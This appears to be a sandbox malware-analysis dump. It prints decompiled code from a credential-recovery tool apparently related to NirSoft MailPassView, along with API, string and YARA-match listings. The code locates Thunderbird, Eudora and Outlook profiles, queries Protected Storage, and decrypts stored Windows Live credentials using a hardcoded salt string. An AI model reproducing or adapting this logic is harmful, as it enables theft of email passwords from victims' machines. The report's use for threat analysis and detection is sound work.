                                                                        				char _v2348;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				int _t65;
                                                                        				char* _t69;
                                                                        				char _t70;
                                                                        				int _t71;
                                                                        				char _t75;
                                                                        				void* _t76;
                                                                        				long _t78;
                                                                        				void* _t83;
                                                                        				int _t85;
                                                                        				void* _t87;
                                                                        				int _t104;
                                                                        				int _t108;
                                                                        				char _t126;
                                                                        				void* _t137;
                                                                        				void* _t139;
                                                                        				char* _t157;
                                                                        				char* _t158;
                                                                        				char* _t160;
                                                                        				int _t161;
                                                                        				void* _t164;
                                                                        				CHAR* _t169;
                                                                        				char* _t170;
                                                                        				void* _t171;
                                                                        				void* _t172;
                                                                        				void* _t173;
                                                                        				void* _t174;
                                                                        				void* _t175;
                                                                        
                                                                        				_v540 = 0;
                                                                        				memset( &_v539, 0, 0x104);
                                                                        				_t164 = 0x1a;
                                                                        				E0040EE59( &_v540, _t164); // executed
                                                                        				_t65 = strlen("Mozilla\\Profiles");
                                                                        				_t6 = strlen( &_v540) + 1; // 0x1
                                                                        				_t172 = _t171 + 0x14;
                                                                        				if(_t65 + _t6 >= 0x104) {
                                                                        					_t69 = _a4;
                                                                        					 *_t69 = 0;
                                                                        					_t157 = _t69;
                                                                        				} else {
                                                                        					_t157 = _a4;
                                                                        					E004062AD(_t157,  &_v540, "Mozilla\\Profiles");
                                                                        				}
                                                                        				_t70 = E0040614B(_t157);
                                                                        				if(_t70 == 0) {
                                                                        					 *_t157 = _t70;
                                                                        				}
                                                                        				_t158 = _t157 + 0x105;
                                                                        				_t71 = strlen("Thunderbird\\Profiles");
                                                                        				_t12 = strlen( &_v540) + 1; // 0x1
                                                                        				if(_t71 + _t12 >= 0x104) {
                                                                        					 *_t158 = 0;
                                                                        				} else {
                                                                        					E004062AD(_t158,  &_v540, "Thunderbird\\Profiles");
                                                                        				}
                                                                        				_t75 = E0040614B(_t158);
                                                                        				_pop(_t137);
                                                                        				if(_t75 == 0) {
                                                                        					 *_t158 = _t75;
                                                                        				}
                                                                        				_t160 = _a4 + 0x20a;
                                                                        				_t76 = E00401C97(_t137, _t160, 0x80000001, "Software\\Qualcomm\\Eudora\\CommandLine", "current"); // executed
                                                                        				_t173 = _t172 + 0xc;
                                                                        				if(_t76 == 0) {
                                                                        					_t126 = E00401C97(_t137, _t160, 0x80000002, "Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current", 0x412466); // executed
                                                                        					_t173 = _t173 + 0xc;
                                                                        					if(_t126 == 0) {
                                                                        						 *_t160 = _t126;
                                                                        					}
                                                                        				}
                                                                        				_v8 = _v8 & 0x00000000;
                                                                        				_t78 = E0040EB3F(0x80000002, "Software\\Mozilla\\Mozilla Thunderbird",  &_v8);
                                                                        				_t174 = _t173 + 0xc;
                                                                        				if(_t78 != 0) {
                                                                        					L32:
                                                                        					_t169 = _a4 + 0x30f;
                                                                        					if( *_t169 != 0) {
                                                                        						L35:
                                                                        						return _t78;
                                                                        					}
                                                                        					ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t169, 0x104);
                                                                        					_t78 = E0040614B(_t169);
                                                                        					if(_t78 != 0) {
                                                                        						goto L35;
                                                                        					}
                                                                        					 *_t169 = _t78;
                                                                        					return _t78;
                                                                        				} else {
                                                                        					_v796 = _t78;
                                                                        					_t161 = 0;
                                                                        					memset( &_v795, 0, 0xff);
                                                                        					_v12 = 0;
                                                                        					_t83 = E0040EC05(_v8, 0,  &_v796);
                                                                        					_t175 = _t174 + 0x18;
                                                                        					if(_t83 != 0) {
                                                                        						L31:
                                                                        						_t78 = RegCloseKey(_v8);
                                                                        						goto L32;
                                                                        					}
                                                                        					_t170 = "sqlite3.dll";
                                                                        					do {
                                                                        						_t85 = atoi( &_v796);
                                                                        						_pop(_t139);
                                                                        						if(_t85 < 3) {
                                                                        							goto L28;
                                                                        						}
                                                                        						_v2348 = 0;
                                                                        						memset( &_v2347, _t161, 0x3ff);
                                                                        						_v276 = 0;
                                                                        						memset( &_v275, _t161, 0x104);
                                                                        						sprintf( &_v2348, "%s\\Main",  &_v796);
                                                                        						E0040EBC1(_t139, _v8,  &_v2348, "Install Directory",  &_v276, 0x104);
                                                                        						_t175 = _t175 + 0x38;
                                                                        						if(_v276 != 0 && E0040614B( &_v276) != 0) {
                                                                        							_v1060 = 0;
                                                                        							memset( &_v1059, _t161, 0x104);
                                                                        							_v1324 = 0;
                                                                        							memset( &_v1323, _t161, 0x104);
                                                                        							_t104 = strlen(_t170);
                                                                        							_t41 = strlen( &_v276) + 1; // 0x1
                                                                        							_t175 = _t175 + 0x20;
                                                                        							if(_t104 + _t41 >= 0x104) {
                                                                        								_v1060 = 0;
                                                                        							} else {
                                                                        								E004062AD( &_v1060,  &_v276, _t170);
                                                                        							}
                                                                        							_t108 = strlen("nss3.dll");
                                                                        							_t47 = strlen( &_v276) + 1; // 0x1
                                                                        							if(_t108 + _t47 >= 0x104) {
                                                                        								_v1324 = 0;
                                                                        							} else {
                                                                        								E004062AD( &_v1324,  &_v276, "nss3.dll");
                                                                        							}
                                                                        							if(E0040614B( &_v1060) == 0 || E0040614B( &_v1324) == 0) {
                                                                        								_t161 = 0;
                                                                        								goto L28;
                                                                        							} else {
                                                                        								strcpy(_a4 + 0x30f,  &_v276);
                                                                        								goto L31;
                                                                        							}
                                                                        						}
                                                                        						L28:
                                                                        						_v12 = _v12 + 1;
                                                                        						_t87 = E0040EC05(_v8, _v12,  &_v796);
                                                                        						_t175 = _t175 + 0xc;
                                                                        					} while (_t87 == 0);
                                                                        					goto L31;
                                                                        				}
                                                                        			}














































                                                                        APIs
                                                                        • memset.MSVCRT ref: 00401EAD
                                                                        • strlen.MSVCRT ref: 00401EC6
                                                                        • strlen.MSVCRT ref: 00401ED4
                                                                        • strlen.MSVCRT ref: 00401F1A
                                                                        • strlen.MSVCRT ref: 00401F28
                                                                        • memset.MSVCRT ref: 00401FD3
                                                                        • atoi.MSVCRT ref: 00402002
                                                                        • memset.MSVCRT ref: 00402025
                                                                        • sprintf.MSVCRT ref: 00402052
                                                                          • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                        • memset.MSVCRT ref: 004020A8
                                                                        • memset.MSVCRT ref: 004020BD
                                                                        • strlen.MSVCRT ref: 004020C3
                                                                        • strlen.MSVCRT ref: 004020D1
                                                                        • strlen.MSVCRT ref: 00402104
                                                                        • strlen.MSVCRT ref: 00402112
                                                                        • memset.MSVCRT ref: 0040203A
                                                                          • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                          • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                        • strcpy.MSVCRT(?,00000000), ref: 00402199
                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004021A3
                                                                        • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004021BE
                                                                          • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strlen$memset$Closestrcpy$AttributesEnvironmentExpandFileStringsatoisprintfstrcat
                                                                        • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                        • API String ID: 2492260235-4223776976
                                                                        • Opcode ID: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
                                                                        • Instruction ID: fcae88f02dbfb35d0bd4b12665d2d891c1e7b320b053452542e36e55e3802549
                                                                        • Opcode Fuzzy Hash: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
                                                                        • Instruction Fuzzy Hash: C891E472904158BADB21E765CC46FDA77AC9F44308F1004BBF609F2182EB789BD58B5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E0040B9AD(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                        				char* _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _v28;
                                                                        				intOrPtr _v32;
                                                                        				void* _v304;
                                                                        				signed int _v308;
                                                                        				struct HWND__* _v312;
                                                                        				intOrPtr _v604;
                                                                        				struct HACCEL__* _v620;
                                                                        				struct HWND__* _v644;
                                                                        				char _v900;
                                                                        				char _v904;
                                                                        				char _v908;
                                                                        				struct tagMSG _v936;
                                                                        				intOrPtr _v940;
                                                                        				struct HWND__* _v944;
                                                                        				struct HWND__* _v948;
                                                                        				char _v956;
                                                                        				char _v980;
                                                                        				char _v988;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* _t49;
                                                                        				void* _t52;
                                                                        				int _t56;
                                                                        				int _t58;
                                                                        				int _t68;
                                                                        				void* _t72;
                                                                        				int _t75;
                                                                        				int _t77;
                                                                        				struct HWND__* _t78;
                                                                        				int _t80;
                                                                        				int _t85;
                                                                        				int _t86;
                                                                        				struct HWND__* _t100;
                                                                        
                                                                        				 *0x416b94 = _a4; // executed
                                                                        				_t49 = E00404837(__ecx); // executed
                                                                        				if(_t49 != 0) {
                                                                        					E0040EDAC();
                                                                        					_t52 = E00406A2C( &_v980);
                                                                        					_t100 = 0;
                                                                        					_v940 = 0x20;
                                                                        					_v948 = 0;
                                                                        					_v936.hwnd = 0;
                                                                        					_v944 = 0;
                                                                        					_v936.message = 0;
                                                                        					E0040B785(_t52,  &_v900);
                                                                        					_v8 =  &_v980;
                                                                        					E00406C87(__eflags,  &_v980, _a12);
                                                                        					_t56 = E00406DFB(_v16, "/savelangfile");
                                                                        					__eflags = _t56;
                                                                        					if(_t56 < 0) {
                                                                        						E0040823D(); // executed
                                                                        						_t58 = E00406DFB(_v8, "/deleteregkey");
                                                                        						__eflags = _t58;
                                                                        						if(_t58 < 0) {
                                                                        							 *0x417110 = 0x11223344; // executed
                                                                        							EnumResourceTypesA( *0x416b94, E0040ED91, 0); // executed
                                                                        							__eflags =  *0x417110 - 0x1c233487;
                                                                        							if( *0x417110 == 0x1c233487) {
                                                                        								__eflags =  *((intOrPtr*)(_v12 + 0x30)) - 1;
                                                                        								if(__eflags <= 0) {
                                                                        									L13:
                                                                        									__imp__CoInitialize(_t100);
                                                                        									E0040B70A( &_v908);
                                                                        									__eflags = _v604 - 3;
                                                                        									if(_v604 != 3) {
                                                                        										_push(5);
                                                                        									} else {
                                                                        										_push(3);
                                                                        									}
                                                                        									ShowWindow(_v644, ??);
                                                                        									UpdateWindow(_v644);
                                                                        									_v620 = LoadAcceleratorsA( *0x416b94, 0x67);
                                                                        									E0040AD9D( &_v908);
                                                                        									_t68 = GetMessageA( &_v936, _t100, _t100, _t100);
                                                                        									__eflags = _t68;
                                                                        									if(_t68 == 0) {
                                                                        										L24:
                                                                        										__imp__CoUninitialize();
                                                                        										goto L25;
                                                                        									} else {
                                                                        										do {
                                                                        											_t75 = TranslateAcceleratorA(_v644, _v620,  &_v936);
                                                                        											__eflags = _t75;
                                                                        											if(_t75 != 0) {
                                                                        												goto L23;
                                                                        											}
                                                                        											_t78 =  *0x4171ac;
                                                                        											__eflags = _t78 - _t100;
                                                                        											if(_t78 == _t100) {
                                                                        												L21:
                                                                        												_t80 = IsDialogMessageA(_v644,  &_v936);
                                                                        												__eflags = _t80;
                                                                        												if(_t80 == 0) {
                                                                        													TranslateMessage( &_v936);
                                                                        													DispatchMessageA( &_v936);
                                                                        												}
                                                                        												goto L23;
                                                                        											}
                                                                        											_t85 = IsDialogMessageA(_t78,  &_v936);
                                                                        											__eflags = _t85;
                                                                        											if(_t85 != 0) {
                                                                        												goto L23;
                                                                        											}
                                                                        											goto L21;
                                                                        											L23:
                                                                        											_t77 = GetMessageA( &_v936, _t100, _t100, _t100);
                                                                        											__eflags = _t77;
                                                                        										} while (_t77 != 0);
                                                                        										goto L24;
                                                                        									}
                                                                        								}
                                                                        								_t86 = E0040B8D7( &_v904, __eflags);
                                                                        								__eflags = _t86;
                                                                        								if(_t86 == 0) {
                                                                        									_t100 = 0;
                                                                        									__eflags = 0;
                                                                        									goto L13;
                                                                        								}
                                                                        								_push(_v28);
                                                                        								_v904 = 0x41356c;
                                                                        								L004115D6();
                                                                        								__eflags = _v304;
                                                                        								if(_v304 != 0) {
                                                                        									DeleteObject(_v304);
                                                                        									_v308 = _v308 & 0x00000000;
                                                                        								}
                                                                        								goto L27;
                                                                        							}
                                                                        							MessageBoxA(0, "Failed to load the executable file !", "Error", 0x30);
                                                                        							goto L25;
                                                                        						}
                                                                        						RegDeleteKeyA(0x80000001, "Software\\NirSoft\\MailPassView");
                                                                        						goto L25;
                                                                        					} else {
                                                                        						 *0x417488 = 0x416b28;
                                                                        						E0040836E();
                                                                        						L25:
                                                                        						_push(_v32);
                                                                        						_v908 = 0x41356c;
                                                                        						L004115D6();
                                                                        						__eflags = _v308 - _t100;
                                                                        						if(_v308 != _t100) {
                                                                        							DeleteObject(_v308);
                                                                        							_v312 = _t100;
                                                                        						}
                                                                        						L27:
                                                                        						_v908 = 0x412474;
                                                                        						E00406A4E( &_v988);
                                                                        						E0040462E( &_v956);
                                                                        						E00406A4E( &_v988);
                                                                        						_t72 = 0;
                                                                        						__eflags = 0;
                                                                        						goto L28;
                                                                        					}
                                                                        				} else {
                                                                        					_t72 = _t49 + 1;
                                                                        					L28:
                                                                        					return _t72;
                                                                        				}
                                                                        			}









































                                                                        APIs
                                                                          • Part of subcall function 00404837: LoadLibraryA.KERNEL32(comctl32.dll,73B74DE0,?,00000000,?,?,?,0040B9C9,73B74DE0), ref: 00404856
                                                                          • Part of subcall function 00404837: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                                          • Part of subcall function 00404837: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,73B74DE0), ref: 0040487C
                                                                          • Part of subcall function 00404837: MessageBoxA.USER32 ref: 004048A7
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040BBF8
                                                                        • DeleteObject.GDI32(?), ref: 0040BC0E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                        • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MailPassView
                                                                        • API String ID: 745651260-414181363
                                                                        • Opcode ID: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                                        • Instruction ID: 29be9d14b742f54cd69d53bb86675b71f99c80547e1740e7b57482248bd42427
                                                                        • Opcode Fuzzy Hash: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                                        • Instruction Fuzzy Hash: 9D518D71108345ABC7209F61DD09A9BBBF8FF84705F00483FF685A22A1DB789914CB5E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 65%
                                                                        			E00403C3D(signed int __ecx, void* __eflags, void* __fp0) {
                                                                        				char _v8;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				struct HINSTANCE__* _t38;
                                                                        				void* _t52;
                                                                        				void* _t54;
                                                                        				void* _t56;
                                                                        				void* _t58;
                                                                        				void* _t60;
                                                                        				char* _t73;
                                                                        				void* _t76;
                                                                        				_Unknown_base(*)()* _t86;
                                                                        				void* _t87;
                                                                        				void* _t89;
                                                                        				signed int _t98;
                                                                        				char* _t106;
                                                                        				_Unknown_base(*)()* _t120;
                                                                        				void* _t131;
                                                                        
                                                                        				_t131 = __fp0;
                                                                        				_t91 = __ecx;
                                                                        				_push(__ecx);
                                                                        				_t98 = __ecx;
                                                                        				_t89 = __ecx + 0x87c;
                                                                        				 *(_t89 + 0xc) =  *(_t89 + 0xc) & 0x00000000;
                                                                        				E0040E894(_t89);
                                                                        				_t38 = LoadLibraryA("pstorec.dll"); // executed
                                                                        				 *(_t89 + 8) = _t38;
                                                                        				if(_t38 == 0) {
                                                                        					L4:
                                                                        					E0040E894(_t89);
                                                                        				} else {
                                                                        					_t86 = GetProcAddress(_t38, "PStoreCreateInstance");
                                                                        					_t120 = _t86;
                                                                        					_t91 = 0 | _t120 != 0x00000000;
                                                                        					 *(_t89 + 0x10) = _t86;
                                                                        					if(_t120 != 0) {
                                                                        						goto L4;
                                                                        					} else {
                                                                        						_t91 = _t89 + 4;
                                                                        						_t87 =  *_t86(_t89 + 4, 0, 0, 0);
                                                                        						_t122 = _t87;
                                                                        						if(_t87 != 0) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							 *(_t89 + 0xc) = 1;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				E004047A0(_t98 + 0x890, _t122);
                                                                        				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Gmail account");
                                                                        				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Gmail account");
                                                                        				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Google Account");
                                                                        				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Google Account");
                                                                        				_push(_t98 + 0x858); // executed
                                                                        				E0040754D(_t91, _t122); // executed
                                                                        				E0040719C(_t91, _t98 + 0x86c); // executed
                                                                        				E0040765B(_t122, _t98 + 0x878); // executed
                                                                        				_t52 = E0040EB3F(0x80000001, "Software\\Microsoft\\Internet Account Manager\\Accounts",  &_v8);
                                                                        				_t123 = _t52;
                                                                        				if(_t52 == 0) {
                                                                        					E00402BB8(_t91,  &_v8, _t123, _t131, _t98, 1);
                                                                        				}
                                                                        				_t54 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts",  &_v8);
                                                                        				_t124 = _t54;
                                                                        				if(_t54 == 0) {
                                                                        					E00402BB8(_t91,  &_v8, _t124, _t131, _t98, 5);
                                                                        				}
                                                                        				E00402C44(_t91, _t131, _t98); // executed
                                                                        				 *((intOrPtr*)(_t98 + 0xb1c)) = 6;
                                                                        				_t56 = E00406278();
                                                                        				_push( &_v8);
                                                                        				if( *((intOrPtr*)(_t56 + 0x10)) != 1) {
                                                                        					_push("Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles");
                                                                        				} else {
                                                                        					_push("Software\\Microsoft\\Windows Messaging Subsystem\\Profiles");
                                                                        				}
                                                                        				_push(0x80000001);
                                                                        				_t58 = E0040EB3F();
                                                                        				_t126 = _t58;
                                                                        				if(_t58 != 0) {
                                                                        					 *((char*)(_t98 + 0xa9c)) = 0;
                                                                        				} else {
                                                                        					E00402B09( &_v8, _t126, _t131, _t98);
                                                                        				}
                                                                        				 *((intOrPtr*)(_t98 + 0xb1c)) = 0xf;
                                                                        				_t60 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles",  &_v8);
                                                                        				_t127 = _t60;
                                                                        				if(_t60 != 0) {
                                                                        					 *((char*)(_t98 + 0xa9c)) = 0;
                                                                        				} else {
                                                                        					E00402B09( &_v8, _t127, _t131, _t98);
                                                                        				}
                                                                        				E0040E8AB(_t89);
                                                                        				E004047F1(_t98 + 0x890);
                                                                        				E00402FC2(_t98, _t91, _t131, 0x80000001); // executed
                                                                        				E00402FC2(_t98, _t91, _t131, 0x80000002); // executed
                                                                        				E0040329E(_t131, _t98);
                                                                        				E004034CB(_t91, _t127, _t131, _t98); // executed
                                                                        				E0040396C(_t127, _t131, _t98); // executed
                                                                        				E004037B1(_t91, _t98, _t131, _t98); // executed
                                                                        				_t73 = _t98 + 0xb20;
                                                                        				_t128 =  *_t73;
                                                                        				if( *_t73 != 0) {
                                                                        					 *((intOrPtr*)(_t98 + 0xf34)) = 0xa;
                                                                        					E0040D37A(_t98 + 0x1c8, _t128, _t73, 0);
                                                                        				}
                                                                        				_t106 = _t98 + 0xc25;
                                                                        				_t129 =  *_t106;
                                                                        				if( *_t106 != 0) {
                                                                        					strcpy(_t98 + 0x52a, _t98 + 0xe2f);
                                                                        					 *((intOrPtr*)(_t98 + 0xf34)) = 0xb;
                                                                        					E0040D37A(_t98 + 0x1c8, _t129, _t106, 0);
                                                                        				}
                                                                        				_push(_t98 + 0x640); // executed
                                                                        				E0040D9F9(_t129); // executed
                                                                        				E0040D865(_t98 + 0x640);
                                                                        				_t76 = E00410D1B(_t98 + 0x870, _t98 + 0x870); // executed
                                                                        				return _t76;
                                                                        			}






















                                                                        APIs
                                                                          • Part of subcall function 0040E894: FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                                        • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C5C
                                                                        • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C71
                                                                        • strcpy.MSVCRT(?,?), ref: 00403E45
                                                                        Strings
                                                                        • pstorec.dll, xrefs: 00403C57
                                                                        • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CFD
                                                                        • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D62
                                                                        • www.google.com:443/Please log in to your Google Account, xrefs: 00403CCB
                                                                        • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D95
                                                                        • www.google.com/Please log in to your Gmail account, xrefs: 00403CAD
                                                                        • PStoreCreateInstance, xrefs: 00403C6B
                                                                        • www.google.com/Please log in to your Google Account, xrefs: 00403CC1
                                                                        • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403D22
                                                                        • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D69
                                                                        • www.google.com:443/Please log in to your Gmail account, xrefs: 00403CB7
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Library$AddressFreeLoadProcstrcpy
                                                                        • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                        • API String ID: 2884822230-961845771
                                                                        • Opcode ID: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
                                                                        • Instruction ID: d05da07ce2d894a49ef5f331cfc6c83e82fbb8602fa7f27bb7646818df223e42
                                                                        • Opcode Fuzzy Hash: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
                                                                        • Instruction Fuzzy Hash: 9B51D771600605B6D714BF72CD46BEABB6CAF00709F10053FF905B61C2DBBCAA5587A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 96%
                                                                        			E0040D9F9(void* __eflags, void* _a4, int _a8, int _a12, void* _a16, char _a20, void* _a24, int _a28, void* _a32, int _a36, void _a40, void _a104) {
                                                                        				void* _v0;
                                                                        				void* __esi;
                                                                        				long _t34;
                                                                        				long _t36;
                                                                        				long _t40;
                                                                        				void* _t64;
                                                                        				void* _t68;
                                                                        				int _t73;
                                                                        
                                                                        				E004118A0(0x102c, _t64);
                                                                        				_t34 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\IdentityCRL", 0, 0x20019,  &_v0); // executed
                                                                        				if(_t34 != 0) {
                                                                        					L10:
                                                                        					return _t34;
                                                                        				}
                                                                        				_t36 = RegOpenKeyExA(_v0, "Dynamic Salt", 0, 0x20019,  &_a4); // executed
                                                                        				if(_t36 != 0) {
                                                                        					L9:
                                                                        					_t34 = RegCloseKey(_v0); // executed
                                                                        					goto L10;
                                                                        				}
                                                                        				_a8 = 0x1000;
                                                                        				_t40 = RegQueryValueExA(_a4, "Value", 0,  &_a36,  &_a40,  &_a8);
                                                                        				_t81 = _t40;
                                                                        				if(_t40 == 0) {
                                                                        					_t63 = _a4 + 0xc;
                                                                        					if(E004047A0(_a4 + 0xc, _t81) != 0) {
                                                                        						_a20 = _a8;
                                                                        						_a24 =  &_a40;
                                                                        						_t73 = 0x40;
                                                                        						_t68 = L"%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd";
                                                                        						_a28 = _t73;
                                                                        						_a32 = _t68;
                                                                        						if(E00404811(_t63,  &_a20,  &_a28,  &_a12) != 0) {
                                                                        							if(_a12 < 0x400) {
                                                                        								memcpy( &_a40, _t68, _t73);
                                                                        								memcpy( &_a104, _a16, _a12);
                                                                        								E0040D6FB(_t64, _a12 + _t73, _a4,  &_a40, _a12 + _t73, _v0);
                                                                        							}
                                                                        							LocalFree(_a16);
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				RegCloseKey(_a4);
                                                                        				goto L9;
                                                                        			}












                                                                        APIs
                                                                        • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA2A
                                                                        • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA44
                                                                        • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E70,?), ref: 0040DA6F
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E70,?), ref: 0040DB20
                                                                          • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
                                                                          • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                        • memcpy.MSVCRT ref: 0040DADD
                                                                        • memcpy.MSVCRT ref: 0040DAF2
                                                                          • Part of subcall function 0040D6FB: RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                                          • Part of subcall function 0040D6FB: memset.MSVCRT ref: 0040D743
                                                                          • Part of subcall function 0040D6FB: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                                          • Part of subcall function 0040D6FB: RegCloseKey.ADVAPI32(?), ref: 0040D858
                                                                        • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E70,?), ref: 0040DB16
                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E70,?), ref: 0040DB2A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                        • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                        • API String ID: 2768085393-1693574875
                                                                        • Opcode ID: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                                        • Instruction ID: 6117dd664a6da5d1700893ef21bfd696e4846e6baba0a559227c27352822965f
                                                                        • Opcode Fuzzy Hash: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                                        • Instruction Fuzzy Hash: 95316D72504344AFD700DF55DC40D9BBBECEB88358F40493EFA84E2160E774DA188B6A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				struct HINSTANCE__* _t33;
                                                                        				intOrPtr* _t35;
                                                                        				intOrPtr* _t36;
                                                                        				void* _t39;
                                                                        				void _t41;
                                                                        				intOrPtr _t48;
                                                                        				signed int _t50;
                                                                        				int _t52;
                                                                        				intOrPtr _t55;
                                                                        				signed int _t56;
                                                                        				signed int _t57;
                                                                        				intOrPtr _t62;
                                                                        				intOrPtr _t63;
                                                                        				intOrPtr* _t65;
                                                                        				intOrPtr* _t69;
                                                                        				int _t70;
                                                                        				void* _t71;
                                                                        				intOrPtr _t79;
                                                                        
                                                                        				_push(0x70);
